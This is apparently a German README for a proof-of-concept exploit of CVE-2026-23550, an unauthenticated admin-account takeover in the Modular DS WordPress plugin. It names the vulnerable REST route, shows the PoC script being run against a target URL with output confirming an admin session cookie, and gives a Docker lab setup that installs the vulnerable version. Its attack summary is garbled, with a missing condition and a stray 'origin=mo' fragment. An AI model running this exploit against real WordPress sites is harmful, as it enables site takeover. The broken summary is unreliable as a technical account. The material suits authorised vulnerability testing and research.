
CVE-2026-23550 - Modular DS WordPress Plugin **Nicht authentifizierter Admin-Zugriff**
Proof-of-Concept (PoC), das CVE-2026-23550 demonstriert – kritische Übernahme von Admin-Konten ohne Authentifizierung im Modular DS WordPress-Plugin (Versionen ≤2.5.1). Wird aktiv in freier Wildbahn ausgenutzt.

Angriffszusammenfassung: Fehlerhaftes REST-API-Routing in /api/modular-connector/login umgeht die WordPress-Authentifizierung, wenn , und gewährt unauthentifizierte Admin-Sitzungscookies.
origin=mo# Produktionsreifes PoC
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VERWUNDBAR: Admin-Sitzungscookie ausgestellt
Der betroffene REST-Endpunkt ist ausschließlich über den ?rest_route=-Mechanismus erreichbar; der direkte Zugriff über /wp-json/ ist möglicherweise nicht verfügbar. Die Schwachstelle ermöglicht unauthentifizierten Zugriff ohne Anmeldedaten oder Nonce-Validierung. Die erfolgreiche Ausstellung eines WordPress-Administrator-Sitzungscookies gilt als Bestätigung der Ausnutzung. Dieses Proof-of-Concept führt keine administrativen Aktionen aus. Modular DS Version 2.5.0 wird beim Testen verwendet.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
Warten auf: "ready for connections"
curl http://localhost:8080/?rest_route=/
Erwartet:
{
"name": "...",
"namespaces": [...]
}
Wenn dies fehlschlägt → STOPP, die Umgebung ist defekt.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
Hinweis: Wenn Sie Cookies in einer Textdatei möchten, entfernen Sie "rm -f "$COOKIE_JAR"" aus der Datei poc.sh.
MIT-Lizenz – Nur für Sicherheitsforschung und autorisierte Penetrationstests. Nicht für böswillige Nutzung. Verantwortungsvoll offenlegen.
Dieses PoC ist nur für autorisierte Sicherheitstests gedacht. Die unbefugte Nutzung gegen Produktionssysteme ist illegal. Melden Sie Erkenntnisse den Plugin-Maintainern.